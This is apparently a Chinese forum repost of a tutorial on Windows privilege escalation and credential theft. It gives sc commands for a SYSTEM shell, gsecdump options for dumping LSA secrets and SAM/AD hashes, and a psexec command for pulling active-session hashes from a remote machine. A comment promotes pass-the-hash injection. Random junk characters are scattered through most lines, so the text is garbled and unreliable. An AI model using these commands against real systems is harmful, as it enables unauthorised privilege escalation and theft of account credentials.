o get a DOS Prompt as NT system:3 |% N/ m* V! y/ r8 z: ^% ^2 M; s2 o/ j
i; m6 R) N1 Y
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
& x- P# X5 U# h8 ?1 V/ D[SC] CreateService SUCCESS) X: }$ E2 ?$ f7 p% _( U
1 a/ L$ G1 F1 ~) pC:\>sc start shellcmdline4 X% p8 P, a) q
[SC] StartService FAILED 1053:
' Q8 x% p% c3 m
2 x" V ?# B! ~; s% }The service did not respond to the start or control request in a timely fashion.
7 `7 u& I# y* h6 O) g5 @! n! H6 T' V2 l
C:\>sc delete shellcmdline0 \( I; Y' G" v% S
[SC] DeleteService SUCCESS
* h% \, N. I8 \2 i- k
, z& V% q% z" r+ c( L0 J _8 L------------
& c) h6 _% ^6 v+ M4 b/ b: E# b3 F. h* `+ S! D# w2 }) l
Then in the new DOS window:% [# L% ] l9 Z& K( s
" U$ C: c) V, ]4 J
Microsoft Windows XP [Version 5.1.2600]% X$ z, E% H% c5 T8 U
(C) Copyright 1985-2001 Microsoft Corp., D3 e- [- ]+ {9 c5 Z
2 \1 r2 X. {2 Y& iC:\WINDOWS\system32>whoami
3 }$ M7 h9 c& ]- _, U uNT AUTHORITY\SYSTEM
* _! t; R, ?6 j+ P. o" B
4 u) A, i2 K8 a9 M/ a( hC:\WINDOWS\system32>gsecdump -h
. i- L. G% j2 Ngsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)# F a. O9 l8 f8 E/ B f. {2 H
usage: gsecdump [options]
+ {. X& L1 n" y3 W& t4 K
% U( j( r+ U7 o+ foptions:
' m* S# y# @/ {, _-h [ --help ] show help
1 i% A2 s/ J" P# R/ ]: d* J-a [ --dump_all ] dump all secrets6 Q; v( u2 j# {( o# R% J) L
-l [ --dump_lsa ] dump lsa secrets% R. v+ `! l% ^
-w [ --dump_wireless ] dump microsoft wireless connections; X$ V4 B% W5 y3 ~: L. d
-u [ --dump_usedhashes ] dump hashes from active logon sessions/ A% v( d: u: G: M1 a- L
-s [ --dump_hashes ] dump hashes from SAM/AD' V. `$ P! v) s, V% C
5 p. G# T, W! W, @; v# H
Although I like to use:
( \* j2 ~% |5 I, Q2 F) B' J0 |- W* {
PsExec v1.83 - Execute processes remotely7 Q6 M0 I+ |, P$ G+ q
Copyright (C) 2001-2007 Mark Russinovich
1 |+ B; v8 @5 `Sysinternals - 链接标记[url]www.sysinternals.com[/url]
* `9 i' U" k$ d" t0 E* Z9 R1 H8 \
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
/ Z' g! C/ R ~3 D0 I" k5 o" j& c# \% |' k
to get the hashes from active logon sessions of a remote system.1 |% t. W$ E% r4 t+ ~. \/ ^. \" J% K
2 Q9 f' B! Y$ c2 ~These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
; ?( g0 f+ i+ r- v& J% |% {
9 f) ?2 k* \7 ]5 @提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.. d- V; W; k8 R2 O
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
1 \+ Q5 X! ?$ |% q& J
( Q+ D; C2 D3 F* b- e我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
: K; v1 b6 q; b/ h, w/ |9 V |
发表于 2012-11-6 21:09:29
收藏
支持
反对